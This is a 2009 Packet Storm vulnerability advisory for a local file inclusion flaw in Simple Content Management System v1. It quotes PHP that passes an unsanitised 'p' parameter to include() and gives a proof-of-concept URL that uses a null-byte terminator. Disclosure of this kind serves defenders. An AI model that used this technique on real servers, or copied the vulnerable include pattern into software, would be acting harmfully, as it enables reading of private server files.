SCMS 1 Local File Inclusion

2009-01-20T00:00:00
ID PACKETSTORM:74118
Type packetstorm
Reporter ahmadbady
Modified 2009-01-20T00:00:00

Description

                                        
                                            ` --:local file include:--  
---------------------------------   
script:simple content management system v 1  
  
-------------------------------------------------------  
download from:http://futurekast.com/fcms/php/SCMSv1.zip  
  
-------------------------------------------------------  
  
...............................................  
vul:/index.php line 34:  
  
<?php   
if (!isset($_GET['p']))  
include("../SCMSv1/includes/default.txt");  
} else include("includes/" . $_GET['p'] . ".txt");  
?>  
-------------------------------------------  
-------------------------------------------  
xpl:  
  
http://127.0.0.1/path/index.php?p=[Lfi]%00  
  
***************************************************  
***************************************************  
---------------------------------------------------  
Author: ahmadbady [kivi_hacker666@yahoo.com]  
  
from:[iran]  
---------------------------------------------------  
  
  
`